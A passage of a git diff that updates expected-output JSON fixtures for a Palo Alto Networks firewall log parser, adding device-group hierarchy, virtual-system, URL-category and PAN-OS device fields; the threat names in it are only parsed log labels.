index ed54db08a..bbf2d4e97 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_installed_package_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_installed_package_json.json	
@@ -33,6 +33,10 @@
       "product": "PAN-OS"
     },
     "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "general"
     }
   }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_ldap_brute_force.json b/Palo Alto Networks/paloalto-ngfw/tests/test_ldap_brute_force.json
index 6ba2ed95f..aab8fbd6b 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_ldap_brute_force.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_ldap_brute_force.json	
@@ -51,7 +51,12 @@
       "serial_number": "012001002253"
     },
     "paloalto": {
+      "DGHierarchyLevel1": "24",
+      "DGHierarchyLevel2": "315",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "vulnerability",
+      "VirtualLocation": "vsys1",
       "threat": {
         "id": "40005",
         "name": "LDAP: User Login Brute Force Attempt"
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_new_file_type.json b/Palo Alto Networks/paloalto-ngfw/tests/test_new_file_type.json
index f5f961342..610ab7c24 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_new_file_type.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_new_file_type.json	
@@ -73,8 +73,14 @@
       "serial_number": "007954000XXXXXX"
     },
     "paloalto": {
+      "DGHierarchyLevel1": "999",
+      "DGHierarchyLevel2": "1111",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
       "DirectionOfAttack": "server to client",
-      "Threat_ContentType": "file"
+      "Threat_ContentType": "file",
+      "URLCategory": "business-and-economy",
+      "VirtualLocation": "vsys1"
     },
     "related": {
       "ip": [
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_new_globalprotect.json b/Palo Alto Networks/paloalto-ngfw/tests/test_new_globalprotect.json
index 501fb4be5..25db7ff0a 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_new_globalprotect.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_new_globalprotect.json	
@@ -38,7 +38,12 @@
       "version": "0.0.-1"
     },
     "paloalto": {
+      "DGHierarchyLevel1": "556",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "globalprotect",
+      "VirtualSystemID": "1",
       "connection": {
         "stage": "logout"
       },
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_new_threat_type.json b/Palo Alto Networks/paloalto-ngfw/tests/test_new_threat_type.json
index 80edd7cf5..c3d742b70 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_new_threat_type.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_new_threat_type.json	
@@ -62,8 +62,13 @@
       "serial_number": "007954000370000"
     },
     "paloalto": {
+      "DGHierarchyLevel1": "997",
+      "DGHierarchyLevel2": "1169",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
       "DirectionOfAttack": "client to server",
       "Threat_ContentType": "vulnerability",
+      "VirtualLocation": "vsys1",
       "threat": {
         "category": "brute-force",
         "id": "SSH User Authentication Brute Force Attempt(40015)"
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_new_url_type.json b/Palo Alto Networks/paloalto-ngfw/tests/test_new_url_type.json
index 6a5a4358f..b4a75c57c 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_new_url_type.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_new_url_type.json	
@@ -64,8 +64,14 @@
       "serial_number": "00795400037XXXX"
     },
     "paloalto": {
+      "DGHierarchyLevel1": "997",
+      "DGHierarchyLevel2": "1169",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
       "DirectionOfAttack": "client to server",
-      "Threat_ContentType": "url"
+      "Threat_ContentType": "url",
+      "URLCategory": "computer-and-internet-info",
+      "VirtualLocation": "vsys1"
     },
     "related": {
       "hosts": [
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_ntp_sync_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_ntp_sync_json.json
index 1ad423127..a470b3176 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_ntp_sync_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_ntp_sync_json.json	
@@ -32,6 +32,10 @@
       "product": "PAN-OS"
     },
     "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "ntpd"
     }
   }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_port_up_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_port_up_json.json
index ed9754708..af31efa35 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_port_up_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_port_up_json.json	
@@ -36,6 +36,10 @@
       "product": "PAN-OS"
     },
     "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "port"
     }
   }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_registration_succeed_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_registration_succeed_json.json
index 76aeaa4ce..c9ebd467e 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_registration_succeed_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_registration_succeed_json.json	
@@ -36,6 +36,10 @@
       "product": "PAN-OS"
     },
     "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "fb"
     },
     "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system.json
index c773195d0..2d21571e0 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_system.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system.json	
@@ -30,6 +30,11 @@
       "serial_number": "016201000000"
     },
     "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
+      "EventID": "test-event",
       "Threat_ContentType": "vpn"
     }
   }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_10_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_10_json.json
index 70c358caf..8a299b691 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_10_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_10_json.json	
@@ -34,6 +34,10 @@
       "product": "PAN-OS"
     },
     "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "general"
     },
     "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_11_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_11_json.json
index b481b6c39..4b7dc612f 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_11_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_11_json.json	
@@ -30,6 +30,10 @@
       "product": "PAN-OS"
     },
     "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "url-filtering"
     }
   }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_12_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_12_json.json
index 989c8393e..7901b05ce 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_12_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_12_json.json	
@@ -37,6 +37,10 @@
       "product": "PAN-OS"
     },
     "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "dhcp"
     },
     "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_1_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_1_json.json
index a92e1d91b..30a9a9970 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_1_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_1_json.json	
@@ -33,6 +33,10 @@
       "product": "PAN-OS"
     },
     "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "general"
     }
   }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_2_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_2_json.json
index c546509c6..f74ff5a47 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_2_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_2_json.json	
@@ -30,6 +30,10 @@
       "product": "PAN-OS"
     },
     "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "general"
     }
   }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_3_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_3_json.json
index 452b9d6bb..8c122fc65 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_3_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_3_json.json	
@@ -29,6 +29,10 @@
       "product": "PAN-OS"
     },
     "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "general"
     },
     "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_4_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_4_json.json
index 4b2a51b0f..524aef010 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_4_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_4_json.json	
@@ -30,6 +30,10 @@
       "product": "PAN-OS"
     },
     "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "general"
     }
   }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_5_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_5_json.json
index 36807c11d..f305c2d3e 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_5_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_5_json.json	
@@ -30,6 +30,10 @@
       "product": "PAN-OS"
     },
     "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "general"
     }
   }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_6_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_6_json.json
index a83bce94f..63f3bd258 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_6_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_6_json.json	
@@ -30,6 +30,10 @@
       "product": "PAN-OS"
     },
     "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "general"
     }
   }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_7_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_7_json.json
index 548954584..a00e82987 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_7_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_7_json.json	
@@ -32,6 +32,10 @@
       "product": "PAN-OS"
     },
     "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "general"
     },
     "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_8_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_8_json.json
index cd41f06d0..9cb10263a 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_8_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_8_json.json	
@@ -33,6 +33,10 @@
       "product": "PAN-OS"
     },
     "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "general"
     }
   }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_9_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_9_json.json
index 2130588d1..2aa5ce29e 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_9_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_system_event_9_json.json	
@@ -30,6 +30,10 @@
       "product": "PAN-OS"
     },
     "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "general"
     }
   }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_threat.json b/Palo Alto Networks/paloalto-ngfw/tests/test_threat.json
index db55cc61a..48dc1f1bd 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_threat.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_threat.json	
@@ -47,7 +47,12 @@
       "serial_number": "016201000000"
     },
     "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "url",
+      "VirtualLocation": "vsys1",
       "threat": {
         "id": "9999"
       }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_threat_02.json b/Palo Alto Networks/paloalto-ngfw/tests/test_threat_02.json
index 196fc9c0c..e45d01607 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_threat_02.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_threat_02.json	
@@ -57,7 +57,12 @@
       "serial_number": "012345678910"
     },
     "paloalto": {
+      "DGHierarchyLevel1": "320",
+      "DGHierarchyLevel2": "90",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "vulnerability",
+      "VirtualLocation": "vsys1",
       "threat": {
         "id": "95187",
         "name": "Palo Alto Networks GlobalProtect OS Command Injection Vulnerability"
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_timestamp_palo.json b/Palo Alto Networks/paloalto-ngfw/tests/test_timestamp_palo.json
index bc3ccb698..d2e4e4775 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_timestamp_palo.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_timestamp_palo.json	
@@ -30,6 +30,11 @@
       "serial_number": "026701002348"
     },
     "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
+      "EventID": "general",
       "Threat_ContentType": "general"
     }
   }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_traffic_event_1_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_traffic_event_1_json.json
index cc477a27e..c0f834538 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_traffic_event_1_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_traffic_event_1_json.json	
@@ -59,7 +59,13 @@
       "serial_number": "007954000351998"
     },
     "paloalto": {
-      "Threat_ContentType": "end"
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
+      "Threat_ContentType": "end",
+      "URLCategory": "any",
+      "VirtualLocation": "vsys1"
     },
     "related": {
       "ip": [
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_traffic_event_2_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_traffic_event_2_json.json
index 72bc384fb..cfa92faf3 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_traffic_event_2_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_traffic_event_2_json.json	
@@ -59,7 +59,13 @@
       "serial_number": "007954000351998"
     },
     "paloalto": {
-      "Threat_ContentType": "end"
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
+      "Threat_ContentType": "end",
+      "URLCategory": "any",
+      "VirtualLocation": "vsys1"
     },
     "related": {
       "ip": [
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_update_content_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_update_content_json.json
index 4657c725b..2f58900ab 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_update_content_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_update_content_json.json	
@@ -29,6 +29,10 @@
       "product": "PAN-OS"
     },
     "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "general"
     },
     "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_upgrade_package_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_upgrade_package_json.json
index b22a31f88..9a1d42f34 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_upgrade_package_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_upgrade_package_json.json	
@@ -29,6 +29,10 @@
       "product": "PAN-OS"
     },
     "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "general"
     },
     "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_user_authentication_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_user_authentication_json.json
index 9f659a601..ea53d3353 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_user_authentication_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_user_authentication_json.json	
@@ -29,6 +29,10 @@
       "product": "PAN-OS"
     },
     "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "auth"
     },
     "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_userid.json b/Palo Alto Networks/paloalto-ngfw/tests/test_userid.json
index d2477e4f1..dee27d0e1 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_userid.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_userid.json	
@@ -30,7 +30,14 @@
       "serial_number": "01545100000000"
     },
     "paloalto": {
-      "Threat_ContentType": "login"
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
+      "EventID": "0",
+      "Threat_ContentType": "login",
+      "VirtualLocation": "vsys1",
+      "VirtualSystemID": "1"
     },
     "related": {
       "ip": [
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_web_authentication_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_web_authentication_json.json
index a3738eaf2..23d0aaaf8 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_web_authentication_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_web_authentication_json.json	
@@ -32,6 +32,10 @@
       "product": "PAN-OS"
     },
     "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "general"
     },
     "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_wildfire_failure_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_wildfire_failure_json.json
index 42b530f45..c3b8bcffc 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_wildfire_failure_json.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_wildfire_failure_json.json	
@@ -37,6 +37,10 @@
       "product": "PAN-OS"
     },
     "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "fb"
     },
     "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/threat-url-xff.json b/Palo Alto Networks/paloalto-ngfw/tests/threat-url-xff.json
index 4e097a01e..b6430085e 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/threat-url-xff.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/threat-url-xff.json	
@@ -59,7 +59,13 @@
       "serial_number": "016401004874"
     },
     "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "url",
+      "VirtualLocation": "vsys",
+      "VirtualSystemName": "VSYS",
       "threat": {
         "id": "9999"
       }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/threat_cef.json b/Palo Alto Networks/paloalto-ngfw/tests/threat_cef.json
index 207cd20b3..afc856776 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/threat_cef.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/threat_cef.json	
@@ -72,6 +72,24 @@
     },
     "paloalto": {
       "DirectionOfAttack": "server to client",
+      "PanOSContainerNameSpace": "pns_default",
+      "PanOSDestinationDeviceCategory": "X-Phone",
+      "PanOSDestinationDeviceHost": "pan-622",
+      "PanOSDestinationDeviceMac": "620797415366",
+      "PanOSDestinationDeviceModel": "MI",
+      "PanOSDestinationDeviceOSFamily": "A1",
+      "PanOSDestinationDeviceOSVersion": "Android v9.1",
+      "PanOSDestinationDeviceProfile": "x-profile",
+      "PanOSDestinationDeviceVendor": "Xiaomi",
+      "PanOSEndpointSerialNumber": "xxxxxxxxxxxxxx",
+      "PanOSSourceDeviceHost": "pan-505",
+      "PanOSSourceDeviceModel": "Note 4G",
+      "PanOSSourceDeviceProfile": "x-profile",
+      "PanOSSourceDeviceVendor": "Lenovo",
+      "PanOSSourceLocation": "LY",
+      "PanOSThreatCategory": "unknown",
+      "PanOSThreatID": "27379(27379)",
+      "VirtualLocation": "vsys1",
       "endpoint": {
         "serial_number": "xxxxxxxxxxxxxx"
       },
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/threat_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/threat_csv.json
index cff329e0f..571880744 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/threat_csv.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/threat_csv.json	
@@ -51,7 +51,12 @@
       "serial_number": "001701000000"
     },
     "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
       "Threat_ContentType": "vulnerability",
+      "VirtualLocation": "vsys",
       "threat": {
         "id": "34805",
         "name": "PDF Exploit Evasion Found"
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/traffic1_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/traffic1_csv.json
index b74fdb564..4fd068d08 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/traffic1_csv.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/traffic1_csv.json	
@@ -72,6 +72,12 @@
       "vendor": "Palo Alto Networks",
       "version": "2.0"
     },
+    "paloalto": {
+      "PanOSSessionStartTime": "Jul 31 2022 12:43:06",
+      "PanOSSourceLocation": "10.0.0.0-10.255.255.255",
+      "URLCategory": "computer-and-internet-info",
+      "VirtualLocation": "vsys1"
+    },
     "related": {
       "hosts": [
         "LF-5698-NR"
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/traffic2_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/traffic2_csv.json
index 1469faf57..a892a2a7b 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/traffic2_csv.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/traffic2_csv.json	
@@ -72,6 +72,12 @@
       "vendor": "Palo Alto Networks",
       "version": "2.0"
     },
+    "paloalto": {
+      "PanOSSessionStartTime": "Aug 02 2022 06:41:44",
+      "PanOSSourceLocation": "10.0.0.0-10.255.255.255",
+      "URLCategory": "low-risk",
+      "VirtualLocation": "vsys1"
+    },
     "related": {
       "hosts": [
         "GP cloud service"
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/traffic_cef.json b/Palo Alto Networks/paloalto-ngfw/tests/traffic_cef.json
index 9bf8bd0de..58c77fa30 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/traffic_cef.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/traffic_cef.json	
@@ -78,6 +78,29 @@
       "version": "2.0"
     },
     "paloalto": {
+      "PanOSContainerName": "pan-dp-77754f4",
+      "PanOSContainerNameSpace": "pns_default",
+      "PanOSDestinationDeviceCategory": "N-Phone",
+      "PanOSDestinationDeviceHost": "pan-355",
+      "PanOSDestinationDeviceMac": "530589561221",
+      "PanOSDestinationDeviceModel": "Nexus",
+      "PanOSDestinationDeviceOSFamily": "H1511",
+      "PanOSDestinationDeviceOSVersion": "Android v7",
+      "PanOSDestinationDeviceProfile": "n-profile",
+      "PanOSDestinationDeviceVendor": "Google",
+      "PanOSEndpointSerialNumber": "xxxxxxxxxxxxxx",
+      "PanOSGPHostID": "xxxxxxxxxxxxxx",
+      "PanOSHASessionOwner": "session_owner-4",
+      "PanOSSessionStartTime": "Feb 27 2021 20:15:48",
+      "PanOSSourceDeviceHost": "pan-301",
+      "PanOSSourceDeviceModel": "Nexus",
+      "PanOSSourceDeviceProfile": "n-profile",
+      "PanOSSourceDeviceVendor": "Google",
+      "PanOSSourceDynamicAddressGroup": "aqua_dag",
+      "PanOSSourceLocation": "east-coast",
+      "PanOSX-Forwarded-ForIP": "1.1.1.1",
+      "URLCategory": "custom-category",
+      "VirtualLocation": "vsys1",
       "endpoint": {
         "serial_number": "xxxxxxxxxxxxxx"
       }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/traffic_with_resotimestamp.json b/Palo Alto Networks/paloalto-ngfw/tests/traffic_with_resotimestamp.json
index 1621cfeed..3445ddc4f 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/traffic_with_resotimestamp.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/traffic_with_resotimestamp.json	
@@ -49,7 +49,8 @@
       "serial_number": "026701002040"
     },
     "paloalto": {
-      "Threat_ContentType": "end"
+      "Threat_ContentType": "end",
+      "VirtualLocation": "vsys1"
     },
     "related": {
       "ip": [
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/udp_deny_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/udp_deny_csv.json
index 324587ad2..3238eb5e4 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/udp_deny_csv.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/udp_deny_csv.json	
@@ -49,7 +49,8 @@
       "serial_number": "1801017000"
     },
     "paloalto": {
-      "Threat_ContentType": "deny"
+      "Threat_ContentType": "deny",
+      "VirtualLocation": "vsys1"
     },
     "related": {
       "ip": [
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/url_cef.json b/Palo Alto Networks/paloalto-ngfw/tests/url_cef.json
index f3a6b58d6..41d495725 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/url_cef.json	
+++ b/Palo Alto Networks/paloalto-ngfw/tests/url_cef.json	
@@ -77,6 +77,25 @@
     },
     "paloalto": {
       "DirectionOfAttack": "server to client",
+      "PanOSContainerName": "pan-dp-77754f4",
+      "PanOSContainerNameSpace": "pns_default",
+      "PanOSDestinationDeviceCategory": "L-Phone",
+      "PanOSDestinationDeviceHost": "pan-506",
+      "PanOSDestinationDeviceMac": "150083646537",
+      "PanOSDestinationDeviceModel": "Note XT",
+      "PanOSDestinationDeviceOSFamily": "K8",
+      "PanOSDestinationDeviceOSVersion": "Android v8",
+      "PanOSDestinationDeviceProfile": "l-profile",
+      "PanOSDestinationDeviceVendor": "Lenovo",
+      "PanOSEndpointSerialNumber": "xxxxxxxxxxxxxx",
+      "PanOSSourceDeviceHost": "pan-505",
